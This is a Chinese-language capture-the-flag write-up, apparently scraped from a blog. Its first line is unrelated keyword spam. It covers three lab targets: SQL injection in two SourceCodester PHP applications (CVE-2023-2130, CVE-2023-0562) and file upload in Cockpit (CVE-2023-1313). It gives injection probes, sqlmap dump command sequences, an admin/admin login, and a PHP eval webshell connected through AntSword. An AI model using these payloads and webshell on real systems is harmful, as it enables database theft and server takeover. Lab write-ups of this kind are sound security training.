上海最专业的网站设计制,wordpress 504 gateway time-out,网站建设费用皆选网络,学校网站建设营运预算CVE-2023-2130
靶标介绍#xff1a;
在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。 通过标靶介绍可以知道…CVE-2023-2130
靶标介绍
在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。 通过标靶介绍可以知道在/admin/suppliers/view_details.php页面存在参数id有sql注入漏洞访问该页面 当参数id1 and 11 --时正确id1 and 12 --时错误说明存在sql注入漏洞。
抓包把请求信息保存到5.txt文件中sqlmap梭哈
sqlmap -r 5.txt --batch --dbs sqlmap -r 5.txt --batch -D purchase_order_db --tables sqlmap -r 5.txt --batch -D purchase_order_db -T fllllaaaag --columns sqlmap -r 5.txt --batch -D purchase_order_db -T fllllaaaag -C flag --dump 得到flag
CVE-2023-1313
靶标介绍
cockpit在2.4.1版本之前存在任意文件上传漏洞PS通过在浏览器中打开/install来运行安装 一个登录界面他的提升通过/install来运行安装访问/install,但是重定向到了原登录界面dirsearch进行目录扫描 可以看到存在该目录但是不能够访问尝试弱口令登录
admin / admin
成功登录进去 找上传页面 上传一句话木马
?php phpinfo();eval($_POST[cmd]);?
上传成功后下载浏览后得到上传目录 访问该路径 可以看到配置文件界面说明上传成功,连接蚁剑 CVE-2023-0562
靶标介绍
银行储物柜管理系统是一个基于网络的应用程序用于处理存储银行客户贵重物品的银行储物柜。储物柜的所有详细信息都保存在数据库中。银行储物柜管理系统项目是使用 PHP 和 MySQLi 扩展开发的。
存在mysqli扩展有数据库可能存在sql注入寻找注入点 在这个地方搜索会进行POST传参然后重定向到该页面 抓包测试 把抓包的内容放到5.txt文件中
searchinput* *会默认把该参数作为注入点
sqlmap -r 5.txt --batch --dbs sqlmap -r 5.txt --batch -D blmsdb --tables sqlmap -r 5.txt --batch -D blmsdb -T fllllaaaag --columns sqlmap -r 5.txt --batch -D blmsdb -T fllllaaaag -C flag --dump
